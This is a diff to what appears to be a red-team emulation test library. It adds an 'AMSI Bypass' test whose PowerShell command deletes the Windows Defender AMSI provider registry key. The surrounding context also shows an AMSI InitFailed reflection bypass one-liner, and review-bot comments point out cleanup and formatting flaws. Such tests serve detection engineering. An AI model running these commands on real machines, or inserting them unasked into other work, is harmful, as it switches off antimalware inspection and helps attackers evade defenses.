diff --git a/atomics/T1089/T1089.md b/atomics/T1089/T1089.md
index 08c63e8f..1349e8a1 100644
--- a/atomics/T1089/T1089.md
+++ b/atomics/T1089/T1089.md
@@ -26,6 +26,8 @@
- [Atomic Test #11 - AMSI Bypass - AMSI InitFailed](#atomic-test-11---amsi-bypass---amsi-initfailed)
+- [Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key](#atomic-test-12---amsi-bypass---remove-amsi-provider-reg-key)
+
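Review bot: the second added line in this hunk is a bare blank line after the new TOC entry; the surrounding TOC entries are not separated by blank lines, so check that this gap is what the generator emits for T1089.md and not a hand-edit, otherwise drop the extra `+` blank line.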
@@ -260,3 +262,24 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
```
+
+
+## Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key
+With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
+This test removes the Windows Defender provider registry key.
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `powershell`! Elevation Required (e.g. root or admin)
+```
+Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
+```
+
+
+#### Cleanup Commands:
+```
+New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}"
+```
+
+
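Review bot: the cleanup command only recreates an empty `{2781761E-28E0-4109-99FE-B9D127C57AFE}` key, while the test runs `Remove-Item ... -Recurse`, which also deletes any values or subkeys under that provider key, so the cleanup does not guarantee the host is returned to its pre-test state. Consider capturing the key before removal (for example with `reg export`) and restoring that export in the cleanup, or at minimum stating in the description that cleanup restores only the key itself. The description should also name what the GUID is (the Windows Defender AMSI provider the text refers to) so a reader can confirm the correct key on hosts where a different provider is registered, and note that `Remove-Item` errors out when the key is not present.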
diff --git a/atomics/index.md b/atomics/index.md
index cda438b7..6360f737 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -194,6 +194,7 @@
- Atomic Test #9: Disable Windows IIS HTTP Logging [windows]
- Atomic Test #10: Uninstall Sysmon [windows]
- Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows]
+ - Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 154d1117..5188e4a1 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -6010,6 +6010,21 @@ defense-evasion:
elevation_required: false
command: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\n"
cleanup_command: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)\n"
+ - name: AMSI Bypass - Remove AMSI Provider Reg Key
+ description: "With administrative rights, an adversary can remove the AMSI Provider
+ registry key in HKLM\\Software\\Microsoft\\AMSI to disable AMSI inspection.\nThis
+ test removes the Windows Defender provider registry key. \n"
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: true
+ command: 'Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}"
+ -Recurse
+
+'
+ cleanup_command: New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers"
+ -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}"
T1107:
technique:
external_references:
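Review bot: the `description` scalar ends with `registry key. \n` (a trailing space before the newline), the `command` scalar carries two newlines inside its single quotes, and `cleanup_command` is an unquoted plain scalar, whereas the preceding test uses consistently double-quoted scalars ending in a single `\n`. Since index.yaml and the T1089.md page are generated from the technique's own yaml, the stray whitespace most likely originates in atomics/T1089/T1089.yaml, which this patch does not touch; fix and include that source file and regenerate the indexes rather than editing the generated files directly.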
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index f634da4b..ab263544 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -38,6 +38,7 @@
- Atomic Test #9: Disable Windows IIS HTTP Logging [windows]
- Atomic Test #10: Uninstall Sysmon [windows]
- Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows]
+ - Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)